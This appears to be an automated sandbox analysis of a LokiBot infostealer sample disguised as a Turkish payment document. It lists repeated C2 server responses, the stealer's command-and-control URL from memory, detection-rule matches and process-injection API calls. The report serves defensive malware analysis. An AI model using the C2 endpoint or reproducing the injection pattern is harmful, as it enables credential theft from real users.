            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:45 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: Odeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Odeme_belgesi.exe, 00000001.00000002.2914113707.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://solutviewmen.viewdns.net/bdifygidj/five/fre.php
            Source: Odeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://solutviewmen.viewdns.net/bdifygidj/five/fre.phpwD
            Source: Odeme_belgesi.exe, Odeme_belgesi.exe, 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/

            System Summary

            barindex
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Odeme_belgesi.exeStatic PE information: section name: pNld"O
            Source: Odeme_belgesi.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED2D0 NtReadVirtualMemory,0_2_0A6ED2D0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED800 NtSetContextThread,0_2_0A6ED800
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED6A8 NtWriteVirtualMemory,0_2_0A6ED6A8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED488 NtResumeThread,0_2_0A6ED488
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED2C8 NtReadVirtualMemory,0_2_0A6ED2C8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED6A1 NtWriteVirtualMemory,0_2_0A6ED6A1
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED7F9 NtSetContextThread,0_2_0A6ED7F9
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_0A6ED480 NtResumeThread,0_2_0A6ED480
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E46D00_2_028E46D0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028ED3100_2_028ED310
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E08E00_2_028E08E0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028EBCF80_2_028EBCF8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E38110_2_028E3811
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E2D890_2_028E2D89
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028EB9800_2_028EB980
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028EF5900_2_028EF590
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E25480_2_028E2548
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E6D500_2_028E6D50
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E46850_2_028E4685
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028EAAE00_2_028EAAE0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E6B890_2_028E6B89
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E6B980_2_028E6B98
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028EA3F80_2_028EA3F8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E67580_2_028E6758
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E67680_2_028E6768
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E24EB0_2_028E24EB
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E55800_2_028E5580
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028EB1980_2_028EB198
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E61090_2_028E6109
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E61180_2_028E6118
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E19370_2_028E1937
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E69430_2_028E6943
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E69500_2_028E6950
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_028E55730_2_028E5573
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF4D680_2_04FF4D68
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF6FA00_2_04FF6FA0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF88F00_2_04FF88F0
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF68880_2_04FF6888
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF79F90_2_04FF79F9
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF5BF80_2_04FF5BF8
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 0_2_04FF74C90_2_04FF74C9
